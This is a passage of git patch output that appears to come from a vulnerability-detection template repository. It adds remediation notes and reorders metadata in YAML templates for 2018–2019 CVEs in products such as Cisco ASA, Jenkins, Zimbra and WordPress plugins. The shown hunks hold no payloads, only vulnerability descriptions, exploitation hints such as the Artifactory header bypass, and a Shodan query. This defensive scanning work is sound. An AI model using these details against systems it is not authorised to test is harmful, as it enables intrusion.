to fix the vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 - https://seclists.org/fulldisclosure/2019/Mar/26 @@ -17,13 +19,13 @@ info: cve-id: CVE-2019-9618 cwe-id: CWE-22 epss-score: 0.0643 - cpe: cpe:2.3:a:gracemedia_media_player_project:gracemedia_media_player:1.0:*:*:*:*:wordpress:*:* epss-percentile: 0.92768 + cpe: cpe:2.3:a:gracemedia_media_player_project:gracemedia_media_player:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: gracemedia_media_player_project product: gracemedia_media_player + framework: wordpress tags: wordpress,wp-plugin,lfi,seclists,edb,cve,cve2019 http: diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml index a7f1320033..c308c0b525 100644 --- a/http/cves/2019/CVE-2019-9670.yaml +++ b/http/cves/2019/CVE-2019-9670.yaml @@ -5,6 +5,8 @@ info: author: ree4pwn severity: critical description: Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component. + remediation: | + Upgrade to the latest version of Synacor Zimbra Collaboration (8.7.11p10 or higher) to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/46693/ - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories @@ -19,8 +21,8 @@ info: cve-id: CVE-2019-9670 cwe-id: CWE-611 epss-score: 0.97513 - cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* epss-percentile: 0.9997 + cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: synacor diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml index 279ba4d419..f356b5b6a6 100644 --- a/http/cves/2019/CVE-2019-9726.yaml +++ b/http/cves/2019/CVE-2019-9726.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface. + remediation: | + Apply the latest security patches or updates provided by the vendor. reference: - https://atomic111.github.io/article/homematic-ccu3-fileread - https://nvd.nist.gov/vuln/detail/CVE-2019-9726 @@ -14,8 +16,8 @@ info: cve-id: CVE-2019-9726 cwe-id: CWE-22 epss-score: 0.02964 - cpe: cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.89569 + cpe: cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: eq-3 diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index d7cbd3c291..15f90d1a07 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -5,6 +5,8 @@ info: author: akshansh severity: critical description: JFrog Artifactory 6.7.3 is vulnerable to an admin login bypass issue because by default the access-admin account is used to reset the password of the admin account. While this is only allowable from a connection directly from localhost, providing an X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in turn, assume full control of all artifacts and repositories managed by Artifactory. + remediation: | + Upgrade to a patched version of JFrog Artifactory or apply the necessary security patches. reference: - http://packetstormsecurity.com/files/152172/JFrog-Artifactory-Administrator-Authentication-Bypass.html - https://www.ciphertechs.com/jfrog-artifactory-advisory/ @@ -15,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-9733 epss-score: 0.90473 - cpe: cpe:2.3:a:jfrog:artifactory:6.7.3:*:*:*:*:*:*:* epss-percentile: 0.98408 + cpe: cpe:2.3:a:jfrog:artifactory:6.7.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jfrog diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml index 1e599ab1da..ed0c037ff6 100644 --- a/http/cves/2019/CVE-2019-9915.yaml +++ b/http/cves/2019/CVE-2019-9915.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to the latest version of GetSimple CMS to fix the open redirect vulnerability. reference: - https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms - https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300 @@ -16,11 +18,11 @@ info: cve-id: CVE-2019-9915 cwe-id: CWE-601 epss-score: 0.0016 - cpe: cpe:2.3:a:get-simple.:getsimplecms:3.3.13:*:*:*:*:*:*:* epss-percentile: 0.52017 + cpe: cpe:2.3:a:get-simple.:getsimplecms:3.3.13:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: get-simple. product: getsimplecms tags: cve,cve2019,redirect,getsimple,cms diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml index 50e7beca04..1b317482b8 100644 --- a/http/cves/2019/CVE-2019-9922.yaml +++ b/http/cves/2019/CVE-2019-9922.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files. + remediation: | + Update to the latest version of Harmis Messenger (1.2.3) or apply the patch provided by the vendor to fix the LFI vulnerability. reference: - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md - https://extensions.joomla.org/extension/je-messenger/ @@ -15,13 +17,13 @@ info: cve-id: CVE-2019-9922 cwe-id: CWE-22 epss-score: 0.01413 - cpe: cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:* epss-percentile: 0.84822 + cpe: cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 - framework: joomla\! vendor: harmistechnology product: je_messenger + framework: joomla\! tags: cve,cve2019,joomla,messenger,lfi http: diff --git a/http/cves/2019/CVE-2019-9955.yaml b/http/cves/2019/CVE-2019-9955.yaml index ad8cb849f0..c34655bf4b 100644 --- a/http/cves/2019/CVE-2019-9955.yaml +++ b/http/cves/2019/CVE-2019-9955.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 devices contain a reflected cross-site scripting vulnerability on the security firewall login page via the mp_idx parameter. + remediation: | + Apply the latest security patches provided by Zyxel to fix the Cross-Site Scripting vulnerability (CVE-2019-9955). reference: - http://packetstormsecurity.com/files/152525/Zyxel-ZyWall-Cross-Site-Scripting.html - https://www.exploit-db.com/exploits/46706/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-9955 cwe-id: CWE-79 epss-score: 0.0561 - cpe: cpe:2.3:o:zyxel:atp200_firmware:4.31:*:*:*:*:*:*:* epss-percentile: 0.92301 + cpe: cpe:2.3:o:zyxel:atp200_firmware:4.31:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zyxel diff --git a/http/cves/2019/CVE-2019-9978.yaml b/http/cves/2019/CVE-2019-9978.yaml index 48b321a3ad..41f3796737 100644 --- a/http/cves/2019/CVE-2019-9978.yaml +++ b/http/cves/2019/CVE-2019-9978.yaml @@ -5,6 +5,8 @@ info: author: madrobot,dwisiswant0 severity: medium description: WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro. + remediation: | + Update the Social Warfare plugin to version 3.5.3 or later to mitigate the vulnerability. reference: - https://github.com/mpgn/CVE-2019-9978 - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/ @@ -17,13 +19,13 @@ info: cve-id: CVE-2019-9978 cwe-id: CWE-79 epss-score: 0.97286 - cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:*:wordpress:*:* epss-percentile: 0.99784 + cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: warfareplugins product: social_warfare + framework: wordpress tags: cve,cve2019,wordpress,wp-plugin,ssrf,kev http: From e6a5d8ec22cc7408ed2c1758cd815e1d570bd831 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 6 Sep 2023 18:27:14 +0530 Subject: [PATCH 0197/1090] updated 2018 CVEs --- http/cves/2018/CVE-2018-0127.yaml | 4 +++- http/cves/2018/CVE-2018-0296.yaml | 4 +++- http/cves/2018/CVE-2018-1000129.yaml | 4 +++- http/cves/2018/CVE-2018-1000130.yaml | 4 +++- http/cves/2018/CVE-2018-1000226.yaml | 4 +++- http/cves/2018/CVE-2018-1000533.yaml | 4 +++- http/cves/2018/CVE-2018-1000600.yaml | 6 ++++-- http/cves/2018/CVE-2018-1000671.yaml | 8 +++++--- http/cves/2018/CVE-2018-1000856.yaml | 6 ++++-- http/cves/2018/CVE-2018-1000861.yaml | 4 +++- http/cves/2018/CVE-2018-10093.yaml | 4 +++- http/cves/2018/CVE-2018-10095.yaml | 4 +++- http/cves/2018/CVE-2018-10141.yaml | 4 +++- http/cves/2018/CVE-2018-10201.yaml | 4 +++- http/cves/2018/CVE-2018-10230.yaml | 4 +++- http/cves/2018/CVE-2018-10562.yaml | 4 +++- http/cves/2018/CVE-2018-10818.yaml | 2 ++ http/cves/2018/CVE-2018-10822.yaml | 4 +++- http/cves/2018/CVE-2018-10823.yaml | 4 +++- http/cves/2018/CVE-2018-10956.yaml | 6 ++++-- http/cves/2018/CVE-2018-11227.yaml | 8 +++++--- http/cves/2018/CVE-2018-11231.yaml | 6 ++++-- http/cves/2018/CVE-2018-11409.yaml | 4 +++- http/cves/2018/CVE-2018-11473.yaml | 8 +++++--- http/cves/2018/CVE-2018-11709.yaml | 6 ++++-- http/cves/2018/CVE-2018-11759.yaml | 6 ++++-- http/cves/2018/CVE-2018-11776.yaml | 4 +++- http/cves/2018/CVE-2018-11784.yaml | 6 ++++-- http/cves/2018/CVE-2018-12031.yaml | 4 +++- http/cves/2018/CVE-2018-12054.yaml | 4 +++- http/cves/2018/CVE-2018-1207.yaml | 4 +++- http/cves/2018/CVE-2018-12095.yaml | 4 +++- http/cves/2018/CVE-2018-12296.yaml | 4 +++- http/cves/2018/CVE-2018-12300.yaml | 4 +++- http/cves/2018/CVE-2018-12613.yaml | 4 +++- http/cves/2018/CVE-2018-12634.yaml | 4 +++- http/cves/2018/CVE-2018-12675.yaml | 6 ++++-- http/cves/2018/CVE-2018-1271.yaml | 4 +++- http/cves/2018/CVE-2018-1273.yaml | 4 +++- http/cves/2018/CVE-2018-12909.yaml | 8 +++++--- http/cves/2018/CVE-2018-12998.yaml | 4 +++- http/cves/2018/CVE-2018-1335.yaml | 4 ++-- http/cves/2018/CVE-2018-13379.yaml | 8 +++++--- http/cves/2018/CVE-2018-13380.yaml | 4 +++- http/cves/2018/CVE-2018-13980.yaml | 4 +++- http/cves/2018/CVE-2018-14013.yaml | 4 +++- http/cves/2018/CVE-2018-14064.yaml | 4 +++- http/cves/2018/CVE-2018-14474.yaml | 4 +++- http/cves/2018/CVE-2018-14574.yaml | 4 +++- http/cves/2018/CVE-2018-14728.yaml | 4 +++- http/cves/2018/CVE-2018-14912.yaml | 4 +++- http/cves/2018/CVE-2018-14916.yaml | 4 +++- http/cves/2018/CVE-2018-14918.yaml | 8 +++++--- http/cves/2018/CVE-2018-14931.yaml | 4 +++- http/cves/2018/CVE-2018-15138.yaml | 4 +++- http/cves/2018/CVE-2018-15517.yaml | 4 +++- http/cves/2018/CVE-2018-15535.yaml | 4 +++- http/cves/2018/CVE-2018-15745.yaml | 4 +++- http/cves/2018/CVE-2018-15917.yaml | 6 ++++-- http/cves/2018/CVE-2018-15961.yaml | 6 ++++-- http/cves/2018/CVE-2018-16059.yaml | 4 +++- http/cves/2018/CVE-2018-16133.yaml | 4 +++- http/cves/2018/CVE-2018-16139.yaml | 8 +++++--- http/cves/2018/CVE-2018-16159.yaml | 8 ++++---- http/cves/2018/CVE-2018-16167.yaml | 4 +++- http/cves/2018/CVE-2018-16283.yaml | 6 ++++-- http/cves/2018/CVE-2018-16288.yaml | 4 +++- http/cves/2018/CVE-2018-16299.yaml | 6 ++++-- http/cves/2018/CVE-2018-16341.yaml | 2 ++ http/cves/2018/CVE-2018-16668.yaml | 4 +++- http/cves/2018/CVE-2018-16670.yaml | 4 +++- http/cves/2018/CVE-2018-16671.yaml | 4 +++- http/cves/2018/CVE-2018-16716.yaml | 4 +++- http/cves/2018/CVE-2018-16761.yaml | 4 +++- http/cves/2018/CVE-2018-16763.yaml | 4 +++- http/cves/2018/CVE-2018-16836.yaml | 4 +++- http/cves/2018/CVE-2018-16979.yaml | 6 ++++-- http/cves/2018/CVE-2018-17153.yaml | 6 ++++-- http/cves/2018/CVE-2018-17246.yaml | 4 +++- http/cves/2018/CVE-2018-17254.yaml | 6 +++--- http/cves/2018/CVE-2018-17422.yaml | 8 +++++--- http/cves/2018/CVE-2018-17431.yaml | 4 +++- http/cves/2018/CVE-2018-18069.yaml | 6 ++++-- http/cves/2018/CVE-2018-18264.yaml | 6 ++++-- http/cves/2018/CVE-2018-18323.yaml | 4 +++- http/cves/2018/CVE-2018-18570.yaml | 4 +++- http/cves/2018/CVE-2018-18608.yaml | 8 +++++--- http/cves/2018/CVE-2018-18775.yaml | 4 +++- http/cves/2018/CVE-2018-18777.yaml | 4 +++- http/cves/2018/CVE-2018-18778.yaml | 4 +++- http/cves/2018/CVE-2018-18809.yaml | 8 +++++--- http/cves/2018/CVE-2018-18925.yaml | 4 ++-- http/cves/2018/CVE-2018-19136.yaml | 6 ++++-- http/cves/2018/CVE-2018-19137.yaml | 6 ++++-- http/cves/2018/CVE-2018-19287.yaml | 8 +++++--- http/cves/2018/CVE-2018-19326.yaml | 8 +++++--- http/cves/2018/CVE-2018-19365.yaml | 4 +++- http/cves/2018/CVE-2018-19386.yaml | 4 +++- http/cves/2018/CVE-2018-19439.yaml | 4 ++-- http/cves/2018/CVE-2018-19458.yaml | 4 +++- http/cves/2018/CVE-2018-19749.yaml | 6 ++++-- http/cves/2018/CVE-2018-19751.yaml | 6 ++++-- http/cves/2018/CVE-2018-19752.yaml | 6 ++++-- http/cves/2018/CVE-2018-19753.yaml | 4 +++- http/cves/2018/CVE-2018-19877.yaml | 6 ++++-- http/cves/2018/CVE-2018-19892.yaml | 6 ++++-- http/cves/2018/CVE-2018-19914.yaml | 6 ++++-- http/cves/2018/CVE-2018-19915.yaml | 6 ++++-- http/cves/2018/CVE-2018-20009.yaml | 6 ++++-- http/cves/2018/CVE-2018-20010.yaml | 6 ++++-- http/cves/2018/CVE-2018-20011.yaml | 6 ++++-- http/cves/2018/CVE-2018-20462.yaml | 6 ++++-- http/cves/2018/CVE-2018-20463.yaml | 8 +++++--- http/cves/2018/CVE-2018-20470.yaml | 4 +++- http/cves/2018/CVE-2018-20526.yaml | 8 +++++--- http/cves/2018/CVE-2018-20608.yaml | 4 +++- http/cves/2018/CVE-2018-20824.yaml | 6 ++++-- http/cves/2018/CVE-2018-20985.yaml | 6 ++++-- http/cves/2018/CVE-2018-2392.yaml | 6 ++++-- http/cves/2018/CVE-2018-2791.yaml | 4 +++- http/cves/2018/CVE-2018-2894.yaml | 4 +++- http/cves/2018/CVE-2018-3167.yaml | 6 ++++-- http/cves/2018/CVE-2018-3238.yaml | 4 +++- http/cves/2018/CVE-2018-3714.yaml | 6 ++++-- http/cves/2018/CVE-2018-3760.yaml | 4 +++- http/cves/2018/CVE-2018-3810.yaml | 6 ++++-- http/cves/2018/CVE-2018-5230.yaml | 6 ++++-- http/cves/2018/CVE-2018-5233.yaml | 6 ++++-- http/cves/2018/CVE-2018-5316.yaml | 8 +++++--- http/cves/2018/CVE-2018-5715.yaml | 8 +++++--- http/cves/2018/CVE-2018-6008.yaml | 6 ++++-- http/cves/2018/CVE-2018-6184.yaml | 6 ++++-- http/cves/2018/CVE-2018-6200.yaml | 6 ++++-- http/cves/2018/CVE-2018-6530.yaml | 4 +++- http/cves/2018/CVE-2018-6910.yaml | 4 +++- http/cves/2018/CVE-2018-7251.yaml | 4 +++- http/cves/2018/CVE-2018-7422.yaml | 6 ++++-- http/cves/2018/CVE-2018-7467.yaml | 4 +++- http/cves/2018/CVE-2018-7490.yaml | 4 +++- http/cves/2018/CVE-2018-7600.yaml | 6 ++++-- http/cves/2018/CVE-2018-7602.yaml | 6 ++++-- http/cves/2018/CVE-2018-7653.yaml | 8 +++++--- http/cves/2018/CVE-2018-7662.yaml | 4 +++- http/cves/2018/CVE-2018-7700.yaml | 4 +++- http/cves/2018/CVE-2018-7719.yaml | 4 +++- http/cves/2018/CVE-2018-8006.yaml | 4 +++- http/cves/2018/CVE-2018-8033.yaml | 4 +++- http/cves/2018/CVE-2018-8715.yaml | 4 +++- http/cves/2018/CVE-2018-8719.yaml | 6 ++++-- http/cves/2018/CVE-2018-8727.yaml | 4 +++- http/cves/2018/CVE-2018-8770.yaml | 4 +++- http/cves/2018/CVE-2018-9118.yaml | 8 ++++---- http/cves/2018/CVE-2018-9161.yaml | 4 +++- http/cves/2018/CVE-2018-9205.yaml | 6 +++--- http/cves/2018/CVE-2018-9845.yaml | 4 +++- http/cves/2018/CVE-2018-9995.yaml | 4 +++- 156 files changed, 543 insertions(+), 245 deletions(-) diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index a9c797b79b..5baf5b4d69 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -5,6 +5,8 @@ info: author: jrolf severity: critical description: Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device via the web interface, which could lead to the disclosure of confidential information. + remediation: | + Apply the latest firmware update provided by Cisco to fix the vulnerability. reference: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2 - http://web.archive.org/web/20211207054802/https://securitytracker.com/id/1040345 @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-0127 cwe-id: CWE-200,CWE-306 epss-score: 0.0948 - cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* epss-percentile: 0.93961 + cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: "cisco" diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index 042c491e3f..a4355ca662 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cisco Adaptive Security Appliances (ASA) web interfaces could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029. + remediation: | + Apply the necessary security patches or updates provided by Cisco to fix the local file inclusion vulnerability. reference: - https://github.com/yassineaboukir/CVE-2018-0296 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd @@ -18,8 +20,8 @@ info: cve-id: CVE-2018-0296 cwe-id: CWE-22,CWE-20 epss-score: 0.97446 - cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* epss-percentile: 0.99918 + cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index 911308436c..4ff853ba46 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser. + remediation: | + Upgrade to a patched version of Jolokia or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://jolokia.org/#Security_fixes_with_1.5.0 - https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad @@ -18,8 +20,8 @@ info: cve-id: CVE-2018-1000129 cwe-id: CWE-79 epss-score: 0.00232 - cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* epss-percentile: 0.60647 + cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* metadata: max-request: 2 vendor: jolokia diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index a0ff2f9fc8..46e4c5a9ac 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the vulnerability. reference: - https://jolokia.org/#Security_fixes_with_1.5.0 - https://access.redhat.com/errata/RHSA-2018:2669 @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-1000130 cwe-id: CWE-74 epss-score: 0.89191 - cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:* epss-percentile: 0.98305 + cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jolokia diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index 5e0e702474..820ac1157d 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: critical description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler. reference: - https://github.com/cobbler/cobbler/issues/1916 - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-1000226 cwe-id: CWE-732 epss-score: 0.01552 - cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* epss-percentile: 0.85554 + cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cobblerd diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index f5c2c4ad7c..35ac6cc1d6 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution. + remediation: | + Upgrade GitList to version 0.6.0 or later to mitigate this vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000533 @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-1000533 cwe-id: CWE-20 epss-score: 0.97207 - cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:* epss-percentile: 0.99732 + cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: gitlist diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index de3d9880c8..10d5e286d1 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins. + remediation: | + Upgrade Jenkins GitHub Plugin to version 1.29.2 or later to mitigate the vulnerability. reference: - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915 - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ @@ -17,13 +19,13 @@ info: cve-id: CVE-2018-1000600 cwe-id: CWE-200 epss-score: 0.95579 - cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:* epss-percentile: 0.99139 + cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 - framework: jenkins vendor: jenkins product: github + framework: jenkins tags: cve,cve2018,jenkins,ssrf,oast,github http: diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 7d221aea66..4c166e0a86 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs. + remediation: | + Upgrade to a patched version of Sympa (>=6.2.17) or apply the necessary security patches provided by the vendor. reference: - https://github.com/sympa-community/sympa/issues/268 - https://vuldb.com/?id.123670 @@ -17,14 +19,14 @@ info: cve-id: CVE-2018-1000671 cwe-id: CWE-601 epss-score: 0.00831 - cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* epss-percentile: 0.79859 + cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"sympa" verified: true + max-request: 1 vendor: sympa product: sympa + shodan-query: http.html:"sympa" tags: cve,cve2018,redirect,sympa,debian http: diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 736acb1182..04f08ba604 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://github.com/domainmod/domainmod/issues/80 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856 @@ -15,11 +17,11 @@ info: cve-id: CVE-2018-1000856 cwe-id: CWE-79 epss-score: 0.00101 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-percentile: 0.40768 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: domainmod product: domainmod tags: cve,cve2018,domainmod,xss,authenticated diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index 878b09b65d..fbd4a11343 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK,pikpikcu severity: critical description: Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way. + remediation: | + Apply the latest security patches and updates provided by Jenkins to mitigate this vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000861 @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-1000861 cwe-id: CWE-502 epss-score: 0.97412 - cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* epss-percentile: 0.99884 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 1 vendor: jenkins diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index 